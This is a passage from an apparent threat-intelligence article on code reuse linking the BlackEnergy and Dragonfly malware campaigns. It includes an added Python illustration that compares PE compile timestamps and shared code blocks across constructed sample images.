“The BlackEnergy sample used in our comparison was captured in the Ukraine on October 31, 2015, and was mentioned in our post on the evolution of the BlackEnergy Trojan. It is remarkable that this piece of code is almost identical in both samples, and suggests a correlation between the BlackEnergy and Dragonfly campaigns.”
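The correlation work described above (matching samples by hash, comparing compile timestamps, and spotting byte-identical code blocks reused between them) can be illustrated in code. The following Python is an added example, not McAfee's or CrySyS's tooling: it builds constructed, minimal PE-like images, reads the COFF compile timestamp from each, and counts the sliding-window code blocks two samples share. The 2011 timestamp mirrors the one quoted from the CrySyS report; everything else is made up here.

```python
import hashlib
import struct
from datetime import datetime, timezone

COFF_HEADER_LEN = 20  # Machine .. Characteristics, right after the "PE\0\0" signature


def build_sample(compile_ts: int, code: bytes) -> bytes:
    """Constructed minimal PE-like image: MZ stub, e_lfanew -> PE signature, COFF header, code."""
    stub = bytearray(0x40)
    stub[:2] = b"MZ"
    struct.pack_into("<I", stub, 0x3C, 0x40)  # e_lfanew: PE signature lives at 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, compile_ts, 0, 0, 0, 0x102)
    return bytes(stub) + b"PE\0\0" + coff + code


def pe_compile_time(image: bytes) -> datetime:
    """Return the COFF TimeDateStamp as an aware UTC datetime, the value analysts compare."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # signature (4) + Machine (2) + NumberOfSections (2) precede TimeDateStamp
    ts = struct.unpack_from("<I", image, e_lfanew + 8)[0]
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def pe_code(image: bytes) -> bytes:
    """Everything after the COFF header; in this constructed layout that is the code region."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    return image[e_lfanew + 4 + COFF_HEADER_LEN:]


def window_hashes(code: bytes, size: int = 16) -> set:
    """SHA-256 of every size-byte sliding window, so reused blocks match at any alignment."""
    return {hashlib.sha256(code[i:i + size]).hexdigest() for i in range(len(code) - size + 1)}


def shared_blocks(a: bytes, b: bytes, size: int = 16) -> int:
    """Number of identical sliding-window blocks the two samples' code regions have in common."""
    return len(window_hashes(pe_code(a), size) & window_hashes(pe_code(b), size))


# Constructed data: a 32-byte routine reused verbatim in two samples with different
# surrounding code, plus a third, unrelated sample. Timestamps are hypothetical.
REUSED_ROUTINE = bytes(range(32))
TS_2011 = int(datetime(2011, 9, 7, 8, 27, 58, tzinfo=timezone.utc).timestamp())  # 09:27:58+01:00
TS_2017 = int(datetime(2017, 6, 1, 12, 0, 0, tzinfo=timezone.utc).timestamp())
SAMPLE_2011 = build_sample(TS_2011, b"A" * 16 + REUSED_ROUTINE + b"B" * 16)
SAMPLE_2017 = build_sample(TS_2017, b"C" * 24 + REUSED_ROUTINE + b"D" * 8)
UNRELATED = build_sample(TS_2017, b"E" * 64)
```

Real samples have section tables and optional headers between the COFF header and the code, so on actual binaries the code region must be taken from the section table rather than from a fixed offset.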


The experts pointed to an evolution of the code in the backdoors developed by the threat actors, and to the reuse of code across their campaigns.

The malicious code goes to considerable lengths to hide details of the attacks, making attribution hard through the use of false fl